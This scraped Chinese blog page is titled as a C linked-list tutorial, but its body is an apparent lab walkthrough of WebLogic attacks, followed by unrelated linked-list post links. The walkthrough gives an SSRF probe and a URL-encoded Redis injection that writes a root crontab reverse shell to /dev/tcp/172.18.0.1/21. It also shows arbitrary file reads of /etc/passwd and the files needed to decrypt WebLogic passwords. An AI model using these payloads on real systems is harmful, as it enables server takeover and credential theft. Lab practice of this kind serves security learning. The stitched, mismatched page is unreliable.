2. 程式人生 > 其它 >連結串列入門1(C語言的方式講解)

連結串列入門1(C語言的方式講解)

阿新 發佈:2022-03-09

weblogic  ssrf

docker-compose up -d

訪問:ip+埠/uddiexplorer/SearchPublicRegistries.jsp

burp抓包發現有對外網址的請求,我們將其更改為內網127.0.0.1:7001,127.0.0.1:7000,其中7001埠是有的,發包發現返回包的時間長度不一樣基本可以判斷存在ssrf了.

在這漏洞處存在的話響應包存在returned a 404 error code.

注入http頭,利用redis反彈shell:

將如下指令碼通過url編碼

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/172.18.0.1/21 0>&1'\n\n\n\n" config set dir /etc/ config set dbfilename crontab save

編碼後如下:

set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fevil%2F21%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave

換請求包傳送過去.

檔案讀取漏洞:

訪問http://your-ip:7001/hello/file.jsp?path=/etc/passwd可見成功讀取passwd檔案

weblogic密碼使用AES(老版本3DES)加密,對稱加密可解密,只需要找到使用者的密文與加密時的金鑰即可。這兩個檔案均位於base_domain下,名為SerializedSystemIni.dat和config.xml,在本環境中為./security/SerializedSystemIni.dat和./config/config.xml      構造   /hello/file.jsp?path=config/config.xml ,  /hello/file.jsp?path=security/SerializedSystemIni.dat

檔案上傳

 

相關推薦

連結串列入門1C語言方式講解

什麼是連結串列? 如果想知道什麼是連結串列,你得先知道什麼是順序表。1. 順序表就是物理結構上連續。同時,在邏輯結構上也是連續線性的。經典中的經典就是陣列!物理結構就是他們的地址是連續的。邏輯結構是連續線

【15】連結串列基本操作c語言程式碼)

單鏈表 雙鏈表 #include<stdio.h> #include<stdlib.h> // 雙向連結串列 typedef struct DoubleNode

尋找單向環形連結串列的交點C語言

聽說這題還是挺有邏輯性的,我們來看看吧 題目 /** * Definition for singly-linked list.

C語言教程】“雙向迴圈連結串列”學習總結和C語言程式碼實現!

雙向迴圈連結串列 定義 雙向迴圈連結串列和它名字的表意一樣,就是把雙向連結串列的兩頭連線,使其成為了一個環狀連結串列。只需要將表中最後一個節點的next指標指向頭節點,頭節點的prior指標指向尾節點,連結串列

SpringBoot入門java程式碼方式配置

java程式碼方式配置讀取配置檔案中的變數 一 . 先了解幾個相關注解 java配置主要靠java類和一些註解,比較常用的註解有:

linux 關閉csh_Linux下編寫守護程序C語言程式示例

技術標籤:linux 關閉csh 當我們在Linux的終端下執行某個程式後,如果將終端關閉,那麼,你之前執行的那個程式也會隨著終端的關閉而結束。

C語言記憶體三虛擬記憶體到底是什麼?為什麼我們在C語言中看到的地址是假的

C語言中,指標變數的值就是一個記憶體地址,&運算子的作用也是取變數的記憶體地址,請看下面的程式碼:

C語言記憶體二一個程式在計算機中到底是如何執行的?

程式是儲存在硬碟中的,要載入記憶體才能執行,CPU也被設計為只能從記憶體中讀取資料和指令。

C語言記憶體五C語言記憶體對齊,提高定址效率

計算機記憶體是以位元組Byte為單位劃分的,理論上CPU可以訪問任意編號的位元組,但實際情況並非如此。

C語言記憶體九Linux下C語言程式的記憶體佈局記憶體模型

在《虛擬地址空間以及編譯模式》一節中講到,虛擬地址空間在32位環境下的大小為 4GB,在64位環境下的大小為 256TB,那麼,一個C語言程式的記憶體在整個地址空間中是如何分佈的呢?資料在哪裡?程式碼在哪裡?為什麼要

C語言記憶體十三一個函式在棧上到底是怎樣的?

函式的呼叫和棧是分不開的,沒有棧就沒有函式呼叫,本節就來講解函式在棧上是如何被呼叫的。

啊哈演算法C2.S4 連結串列的第一種實現方式——指標和動態分配記憶體函式mollocC語言未完

技術標籤:筆記連結串列 文章目錄 前言一、連結串列與陣列的不同二、回顧指標、動態申請空間1.什麼是指標?2.什麼是動態申請空間?

c語言連結串列實現

節點的結構 struct Node { int value; struct Node* next; }; typedef struct Node Node; 基本功能和操作演示

二杈樹c語言連結串列實現

用例中的樹的結構圖 #include <stdio.h> #include <stdlib.h> typedef int ElemType; struct TreeNode

單向連結串列C語言

單向連結串列   一:建立以及初始化: typedef struct node { int elem; struct node* next;

迴圈連結串列C語言

迴圈連結串列C語言 一:建立雙向連結串列: struct Node { int data; Node* next; }; ​

雙向連結串列C語言

雙向連結串列C語言   一:初始化以及建立: struct Node { int data; Node* prior;

資料結構——二叉連結串列建立二叉樹C語言

技術標籤:資料結構二叉樹資料結構指標 資料結構——二叉連結串列建立二叉樹

線性表之迴圈連結串列的基本操作c語言

技術標籤:資料結構指標連結串列資料結構 本文將著重介紹雙鏈表的迴圈連結串列操作

LeetCode:面試題 02.07. Intersection of Two Linked Lists LCCI連結串列相交C語言

技術標籤:LeetCode 題目描述: 給定兩個單向)連結串列,判定它們是否相交併返回交點。請注意相交的定義基於節點的引用,而不是基於節點的值。換句話說,如果一個連結串列的第k個節點與另一個連結串列的第j個